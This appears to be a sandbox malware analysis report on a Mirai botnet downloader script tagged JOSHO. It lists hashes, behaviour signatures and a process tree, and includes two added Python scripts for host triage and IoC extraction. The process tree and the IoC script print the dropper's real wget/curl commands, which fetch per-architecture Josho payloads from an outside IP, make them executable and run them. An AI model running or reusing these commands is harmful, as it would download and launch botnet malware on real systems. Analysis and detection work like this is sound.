Analysis
- max time kernel: 148s
- max time network: 149s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240226-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240226-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 27-04-2024 17:59
Static task: static1
General
- Target: 8UsA.sh
- Size: 1KB
- MD5: d060b7e197e9a5ef62013de9b1246b0e
- SHA1: 954455791558cc2be3dc1b451f70a40e1de04f3a
- SHA256: 09ae6fb139fb48daf4a6fb4c6754a040367836054ed902f19211806696470cc9
- SHA512: 338d74f70ad3b05762ea3a1e127e00d1e08ffd1c4569d7745b58894bfec1304ef353a40229271f342266637fc2eed2390cb7922c7dadce5b365a8c18e83a82df
Malware Config
Extracted
- Family: mirai
- Botnet tag: JOSHO
Signatures
-
Executes dropped EXE (10 IoCs)
Processes:
  ioc        pid   process
  /tmp/3AvA  1594  3AvA
  /tmp/3AvA  1602  3AvA
  /tmp/3AvA  1610  3AvA
  /tmp/3AvA  1618  3AvA
  /tmp/3AvA  1626  3AvA
  /tmp/3AvA  1634  3AvA
  /tmp/3AvA  1642  3AvA
  /tmp/3AvA  1650  3AvA
  /tmp/3AvA  1658  3AvA
  /tmp/3AvA  1666  3AvA
-
Modifies Watchdog functionality (1 TTP, 20 IoCs)
Malware like Mirai opens the hardware watchdog device and disables it so that a hung or overloaded bot is not rebooted; a reboot would clear the memory-resident infection. Each of the ten 3AvA instances opened both device nodes once.
Processes:
  description                   ioc                 process  occurrences
  File opened for modification  /dev/watchdog       3AvA     10
  File opened for modification  /dev/misc/watchdog  3AvA     10
-
Changes its process name (10 IoCs)
Description: changes the process name, possibly in an attempt to hide itself.
Processes:
  pid   process
  1594  3AvA
  1602  3AvA
  1610  3AvA
  1618  3AvA
  1626  3AvA
  1634  3AvA
  1642  3AvA
  1650  3AvA
  1658  3AvA
  1666  3AvA
-
Writes file to tmp directory (20 IoCs)
Malware often drops the files it needs in the world-writable /tmp directory. Every file below was opened for modification; the Josho.* payloads were each fetched by both wget and curl, except Josho.arm4, where only the curl download wrote a file.
Processes:
  ioc              process
  /tmp/Josho.x86   wget, curl
  /tmp/Josho.mips  wget, curl
  /tmp/Josho.mpsl  wget, curl
  /tmp/Josho.arm4  curl
  /tmp/Josho.arm5  wget, curl
  /tmp/Josho.arm6  wget, curl
  /tmp/Josho.arm7  wget, curl
  /tmp/Josho.ppc   wget, curl
  /tmp/Josho.m68k  wget, curl
  /tmp/Josho.sh4   wget, curl
  /tmp/3AvA        8UsA.sh
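The three signatures above (binary executing from /tmp, process name no longer matching its executable, watchdog device held open) can be re-checked on a live Linux host from /proc. The script below is an added example, not part of the report or of any sandbox vendor's tooling. collect_from_proc() snapshots a real /proc; SAMPLE_PROCESSES is a constructed snapshot shaped after the report's process tree, and the comm value "xkw" for PID 1594 is invented, because the report records that the name changed but not what it changed to. /dev/watchdog0 is included as a device node the report does not mention.

```python
"""Host-side triage for the three behaviours the sandbox flagged on 3AvA.

Added example, not part of the report. Reads /proc on a live host
(collect_from_proc) or a constructed snapshot (SAMPLE_PROCESSES) and applies
three rules modelled on the report's signatures.
"""
import os
from dataclasses import dataclass, field

SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# /dev/watchdog0 is not in the report; it is the usual node on newer kernels.
WATCHDOG_NODES = {"/dev/watchdog", "/dev/watchdog0", "/dev/misc/watchdog"}
TASK_COMM_LEN = 15  # the kernel truncates comm to 15 bytes plus NUL


@dataclass
class ProcInfo:
    pid: int
    comm: str
    exe: str
    cmdline: list
    open_files: list = field(default_factory=list)


@dataclass
class Finding:
    pid: int
    rule: str
    severity: str
    detail: str


def _read(path, default=""):
    try:
        with open(path, "rb") as fh:
            return fh.read().decode("utf-8", "replace")
    except OSError:
        return default


def collect_from_proc(root="/proc"):
    """Snapshot every readable process under `root` into ProcInfo records."""
    procs = []
    for entry in os.listdir(root):
        if not entry.isdigit():
            continue
        base = os.path.join(root, entry)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:
            exe = ""  # kernel thread, or we lack permission
        fds = []
        try:
            for fd in os.listdir(os.path.join(base, "fd")):
                try:
                    fds.append(os.readlink(os.path.join(base, "fd", fd)))
                except OSError:
                    pass
        except OSError:
            pass
        procs.append(ProcInfo(
            pid=int(entry),
            comm=_read(os.path.join(base, "comm")).rstrip("\n"),
            exe=exe,
            cmdline=[a for a in _read(os.path.join(base, "cmdline")).split("\0") if a],
            open_files=fds,
        ))
    return procs


def evaluate(procs):
    """Apply the three report-derived rules; returns findings sorted by PID."""
    findings = []
    for p in procs:
        exe = p.exe.replace(" (deleted)", "")
        from_scratch = exe.startswith(SCRATCH_DIRS)
        if from_scratch:
            findings.append(Finding(p.pid, "executes_dropped_exe", "high",
                                    f"exe {exe} runs from a scratch directory"))
        expected = os.path.basename(exe)[:TASK_COMM_LEN]
        if exe and p.comm != expected:
            findings.append(Finding(p.pid, "changes_process_name",
                                    "high" if from_scratch else "medium",
                                    f"comm {p.comm!r} != exe basename {expected!r}"))
        held = sorted(set(p.open_files) & WATCHDOG_NODES)
        if held:
            # A legitimate watchdog daemon also holds the node open, so the
            # severity hinges on where the binary lives, not on the open itself.
            findings.append(Finding(p.pid, "modifies_watchdog",
                                    "high" if from_scratch else "info",
                                    f"holds {', '.join(held)} open"))
    return sorted(findings, key=lambda f: (f.pid, f.rule))


# Constructed snapshot shaped after the report's process tree. The comm "xkw"
# for PID 1594 is invented; PID 901 is a benign watchdog daemon for contrast.
SAMPLE_PROCESSES = [
    ProcInfo(901, "watchdog", "/usr/sbin/watchdog", ["/usr/sbin/watchdog"], ["/dev/watchdog"]),
    ProcInfo(1576, "wget", "/usr/bin/wget",
             ["wget", "http://209.14.69.249/AB4g5/Josho.x86"], ["/tmp/Josho.x86"]),
    ProcInfo(1594, "xkw", "/tmp/3AvA", ["./3AvA", "ssh"], ["/dev/watchdog"]),
    ProcInfo(1602, "3AvA", "/tmp/3AvA", ["./3AvA", "ssh"], ["/dev/misc/watchdog"]),
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_PROCESSES):
        print(f"{f.severity:6} pid={f.pid:<6} {f.rule:22} {f.detail}")
```

Run it as root on a suspect host with `evaluate(collect_from_proc())`; unprivileged runs will miss exe and fd links for other users' processes, which is why collect_from_proc() tolerates the resulting OSErrors rather than aborting.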
Processes
-
Process tree (image path, PID, command line; indented entries are children of /tmp/8UsA.sh):

/tmp/8UsA.sh  [PID 1575]  /tmp/8UsA.sh
  - Writes file to tmp directory
  /usr/bin/wget  [PID 1576]  wget http://209.14.69.249/AB4g5/Josho.x86
    - Writes file to tmp directory
  /usr/bin/curl  [PID 1591]  curl -O http://209.14.69.249/AB4g5/Josho.x86
    - Writes file to tmp directory
  /bin/cat  [PID 1592]  cat Josho.x86
  /bin/chmod  [PID 1593]  chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
  /tmp/3AvA  [PID 1594]  ./3AvA ssh
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /usr/bin/wget  [PID 1597]  wget http://209.14.69.249/AB4g5/Josho.mips
    - Writes file to tmp directory
  /usr/bin/curl  [PID 1599]  curl -O http://209.14.69.249/AB4g5/Josho.mips
    - Writes file to tmp directory
  /bin/chmod  [PID 1601]  chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
  /tmp/3AvA  [PID 1602]  ./3AvA ssh
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /usr/bin/wget  [PID 1605]  wget http://209.14.69.249/AB4g5/Josho.mpsl
    - Writes file to tmp directory
  /usr/bin/curl  [PID 1607]  curl -O http://209.14.69.249/AB4g5/Josho.mpsl
    - Writes file to tmp directory
  /bin/chmod  [PID 1609]  chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
  /tmp/3AvA  [PID 1610]  ./3AvA ssh
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /usr/bin/wget  [PID 1613]  wget http://209.14.69.249/AB4g5/Josho.arm4
  /usr/bin/curl  [PID 1615]  curl -O http://209.14.69.249/AB4g5/Josho.arm4
    - Writes file to tmp directory
  /bin/chmod  [PID 1617]  chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
  /tmp/3AvA  [PID 1618]  ./3AvA ssh
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /usr/bin/wget  [PID 1621]  wget http://209.14.69.249/AB4g5/Josho.arm5
    - Writes file to tmp directory
  /usr/bin/curl  [PID 1623]  curl -O http://209.14.69.249/AB4g5/Josho.arm5
    - Writes file to tmp directory
  /bin/chmod  [PID 1625]  chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
  /tmp/3AvA  [PID 1626]  ./3AvA ssh
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /usr/bin/wget  [PID 1629]  wget http://209.14.69.249/AB4g5/Josho.arm6
    - Writes file to tmp directory
  /usr/bin/curl  [PID 1631]  curl -O http://209.14.69.249/AB4g5/Josho.arm6
    - Writes file to tmp directory
  /bin/chmod  [PID 1633]  chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
  /tmp/3AvA  [PID 1634]  ./3AvA ssh
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /usr/bin/wget  [PID 1637]  wget http://209.14.69.249/AB4g5/Josho.arm7
    - Writes file to tmp directory
  /usr/bin/curl  [PID 1639]  curl -O http://209.14.69.249/AB4g5/Josho.arm7
    - Writes file to tmp directory
  /bin/chmod  [PID 1641]  chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
  /tmp/3AvA  [PID 1642]  ./3AvA ssh
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /usr/bin/wget  [PID 1645]  wget http://209.14.69.249/AB4g5/Josho.ppc
    - Writes file to tmp directory
  /usr/bin/curl  [PID 1647]  curl -O http://209.14.69.249/AB4g5/Josho.ppc
    - Writes file to tmp directory
  /bin/chmod  [PID 1649]  chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
  /tmp/3AvA  [PID 1650]  ./3AvA ssh
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /usr/bin/wget  [PID 1653]  wget http://209.14.69.249/AB4g5/Josho.m68k
    - Writes file to tmp directory
  /usr/bin/curl  [PID 1655]  curl -O http://209.14.69.249/AB4g5/Josho.m68k
    - Writes file to tmp directory
  /bin/chmod  [PID 1657]  chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
  /tmp/3AvA  [PID 1658]  ./3AvA ssh
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /usr/bin/wget  [PID 1661]  wget http://209.14.69.249/AB4g5/Josho.sh4
    - Writes file to tmp directory
  /usr/bin/curl  [PID 1663]  curl -O http://209.14.69.249/AB4g5/Josho.sh4
    - Writes file to tmp directory
  /bin/chmod  [PID 1665]  chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.sh4 Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
  /tmp/3AvA  [PID 1666]  ./3AvA ssh
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name

Observations on the tree:
- The script loops over ten architectures (x86, mips, mpsl, arm4, arm5, arm6, arm7, ppc, m68k, sh4). Each iteration fetches Josho.<arch> from http://209.14.69.249/AB4g5/ with wget and again with curl -O, runs chmod, then launches /tmp/3AvA with the single argument ssh.
- The chmod argument list in every iteration is the complete contents of /tmp, including unrelated systemd-private-* and snap directories, which is what a bare `chmod +x *` expands to; as a side effect every pre-existing /tmp entry is made executable.
- Only the x86 iteration records a cat of the payload. The file /tmp/3AvA is recorded as opened for modification by the shell (PID 1575) rather than by cat, which is consistent with the cat output being redirected into 3AvA by the shell. The same /tmp/3AvA is then executed in all ten iterations (PIDs 1594 to 1666), and each instance trips the watchdog and process-name signatures.
- The wget for Josho.arm4 (PID 1613) carries no "Writes file to tmp directory" tag; only the matching curl wrote that file.
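The command lines in the tree are the report's most reusable output. The script below is an added example, not part of the report, that turns them into a structured IoC summary: the download host, one payload URL per architecture, the dropped binary and its argument, and the /tmp entries chmod touched that are not payloads. COMMAND_LINES is transcribed from the tree above (all ten wget URLs, two of the curl duplicates, the cat, the last chmod in full, and two of the ten ./3AvA launches); the architecture list in PAYLOAD_RE extends the report's ten with a few other suffixes Mirai builds commonly use, as an assumption.

```python
"""IoC extraction from a sandbox process tree.

Added example, not part of the report. COMMAND_LINES is a subset of the
command lines shown in the report's process tree; extract_iocs() works on any
list of command lines in that shape.
"""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
# Mirai-style per-architecture payload names: <stem>.<arch>. The ten suffixes
# from the report plus a few common extras (assumption, not from the report).
PAYLOAD_RE = re.compile(
    r"^(?P<stem>[\w-]+)\.(?P<arch>x86|x86_64|i\d86|mips|mpsl|arm[4-7]?|ppc|m68k|sh4|spc)$"
)

COMMAND_LINES = [
    "/tmp/8UsA.sh",
    "wget http://209.14.69.249/AB4g5/Josho.x86",
    "curl -O http://209.14.69.249/AB4g5/Josho.x86",
    "cat Josho.x86",
    "./3AvA ssh",
    "wget http://209.14.69.249/AB4g5/Josho.mips",
    "wget http://209.14.69.249/AB4g5/Josho.mpsl",
    "wget http://209.14.69.249/AB4g5/Josho.arm4",
    "wget http://209.14.69.249/AB4g5/Josho.arm5",
    "wget http://209.14.69.249/AB4g5/Josho.arm6",
    "wget http://209.14.69.249/AB4g5/Josho.arm7",
    "wget http://209.14.69.249/AB4g5/Josho.ppc",
    "wget http://209.14.69.249/AB4g5/Josho.m68k",
    "wget http://209.14.69.249/AB4g5/Josho.sh4",
    "curl -O http://209.14.69.249/AB4g5/Josho.sh4",
    "chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 "
    "Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.sh4 Josho.x86 netplan_xrvzy18l "
    "snap-private-tmp ssh-F7vsPmKVSALQ "
    "systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC "
    "systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ "
    "systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK "
    "systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 "
    "systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke "
    "systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o",
    "./3AvA ssh",
]


def extract_iocs(cmdlines):
    """Summarise hosts, per-arch payload URLs, launched droppers and the
    chmod targets that are neither payloads nor the dropper."""
    urls, hosts, payloads = [], set(), {}
    launched, chmod_targets = [], set()
    for line in cmdlines:
        argv = line.split()
        if not argv:
            continue
        for url in URL_RE.findall(line):
            if url not in urls:           # wget and curl fetch the same URL
                urls.append(url)
            parsed = urlparse(url)
            hosts.add(parsed.hostname or "")
            m = PAYLOAD_RE.match(parsed.path.rsplit("/", 1)[-1])
            if m:
                payloads.setdefault(m.group("arch"), url)
        if argv[0].startswith("./"):
            entry = (argv[0], tuple(argv[1:]))
            if entry not in launched:     # ten identical launches collapse to one
                launched.append(entry)
        elif argv[0] == "chmod" and len(argv) > 2:
            chmod_targets.update(argv[2:])  # argv[1] is the mode (+x)
    payload_names = {u.rsplit("/", 1)[-1] for u in urls}
    payload_names |= {cmd[2:] for cmd, _ in launched}
    return {
        "hosts": sorted(h for h in hosts if h),
        "urls": urls,
        "payloads": dict(sorted(payloads.items())),
        "launched": launched,
        # Everything else chmod +x touched: unrelated /tmp entries (and the
        # downloader script itself), the footprint of a bare `chmod +x *`.
        "chmod_collateral": sorted(chmod_targets - payload_names),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(COMMAND_LINES), indent=2))
```

The hosts and urls lists are what goes into a blocklist; chmod_collateral is what to clean up on a host where the script ran, since those directories and files keep their new executable bit after the payload is removed.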
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 46KB
- MD5: a648e3916f191a59f47d07a49702d0eb
- SHA1: 1d9280fd392858f5dbe61aea4cfa2453ade97442
- SHA256: 0a82c84b8564ae5a178e3e8f6fc4550885055043928ee667e59efb035f9ccfc3
- SHA512: 73ef7ce042d0d165c327acd50e984a08b3d8450fb8821c8ef390a8dc02044128836ba7590bd035a072a9b7a4c94defed1256e85b03887788fa998e5648b5e587